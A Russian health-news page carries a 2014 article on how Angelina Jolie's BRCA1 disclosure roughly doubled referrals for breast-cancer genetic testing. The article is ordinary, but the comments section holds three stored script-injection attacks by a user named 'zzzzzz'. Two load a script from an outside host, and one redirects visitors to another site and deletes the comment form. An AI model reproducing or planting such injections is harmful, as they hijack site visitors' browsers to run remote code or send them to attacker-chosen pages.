Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как Анджелина Джоли измен...  >>  Как Анджелина Джоли изменила наш мир?
 
Обратная связь
 

Как Анджелина Джоли изменила наш мир?

Размер шрифта
28 октября 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Количество обращений к врачам-генетикам и тестов на риск развития рака груди возросло вдвое с тех пор, как актриса Анджелина Джоли рассказала в интервью всему миру, что у нее нашли генетическую мутацию BRCA1. В связи с этим она согласилась на операцию по удалению молочных желез (двойная мастэктомия).

Как Анджелина Джоли изменила наш мир?

В статье были проанализированы данные из 21 медицинского центра. Они говорят о том, что в последнее время все больше женщин стали обращаться к своим врачам по поводу обследования груди. Причем среди них есть не только женщины, чьи опасения не являются обоснованными, но и те, в семьях которых были случаи рака груди – таким пациенткам действительно показано генетическое тестирование.

Генетическая мутация BRCA1 передается по наследству и является причиной как минимум 10% случаев рака груди во всем мире. Женщины, у которых есть такая мутация, имеют риск от 45 до 90% заболеть раком груди в течение жизни.

Если у вас в семье были случаи рака груди и у кого-то из живых родственников есть это заболевание, то вы можете пройти тест на определение мутации BRCA1. Клинические рекомендации, которые были опубликованы в Англии вскоре после того, как Анджелина Джоли сделала свое сенсационное заявление, советуют проводить такое тестирование только тем женщинам, у которых высок риск развития опухоли.

Обычно истории из новостей оказывают лишь кратковременный эффект на общество. Однако ученые во главе с Гарретом Эвансом из Манчестера захотели узнать, смогло ли признание Джоли оказать долговременное влияние на людей и их отношение к своему здоровью. Они обнаружили, что число обращений к врачам выросло в два с половиной раза в 2013 году сразу после публикации истории актрисы, по сравнению с данными 2012 года. Это увеличение продолжилось и с августа по октябрь и в два раза превысило цифры за те же месяцы 2012 года.

Гаррет Эванс, профессор клинической генетики в программе по предотвращению рака груди, рассказал: «Хотя у нас были опасения, что такое увеличение количества посещений врача вызвано лишь повторными обращениями уже обследовавшихся женщин, все оказалось совсем наоборот. Наибольшее количество составили женщины, которые обратились впервые». Ученые надеются, что история Анджелины Джоли помогла людям понять, насколько важно учитывать случаи рака груди в семье и то, как можно повлиять на риск развития этого заболевания. Они считают, что нужна дальнейшая работа, чтобы население было лучше осведомлено о проблеме рака груди.

«Заявление Анджелины Джоли о том, что у нее выявлена мутация BRCA1 и она собирается сделать мастэктомию для снижения риска развития опухоли, оказало куда большее влияние на общество, чем истории других знаменитостей. Возможно, это связано с ее образом гламурной и сильной женщины. Это помогло людям побороть страх потерять свою сексуальную привлекательность после такой операции. Джоли также смогла повлиять на тех, кто раньше мало обращался к врачам, и заставить их задуматься о проведении генетического тестирования», – рассказывает Гаррет Эванс. «Такие громкие дела, как история Джоли, ведут к тому, что все больше женщин обращаются в медицинские центры за генетической консультацией. Таким образом, они могут вовремя определить, есть ли у них мутация, и принять меры, чтобы избежать развития рака груди».

«Разумеется, в некоторых случаях необходимо проведение мастэктомии, однако существуют также специальные препараты для предотвращения развития рака, такие как тамоксифен. Все это, а также изменение образа жизни, здоровое питание и физические упражнения – вот те варианты, которые женщины могут рассмотреть», – добавляет Эванс.

Поэтому не бойтесь задать своему врачу все вопросы о здоровье вашей груди, которые вас волнуют. А если в вашей семье были случаи заболевания раком груди – обратитесь к специалисту, который, возможно, назначит вам генетический тест.

Другие статьи о женском здоровье читайте на страницах нашего специального проекта «Женское здоровье».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:30

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:31

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:26

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Муж не может долго заниматься сексом? Всего одна вещь решит вашу проблему!   Может ли морковка в день избавить вас от рака груди?   Как самой обследовать грудь   Что нужно женщинам?! Начинается на букву Д!  
23 июля 2013Из лысых крыс сделают лекарство от рака 26 июня 2013Что пить, чтобы не было рака груди?
 
15 мая 2013Ура! Ходить по лестнице так же эффективно для похудения, как ходить в спортивный зал! 04 апреля 2013Когда делать зарядку, чтобы худеть быстрее
 

Слайдшоу

1
Факторы, которые влияют на возникновение рака
Ответы на все вопросы о раке груди
Тесты для вашей любимой груди

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Что вы знаете о груди?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.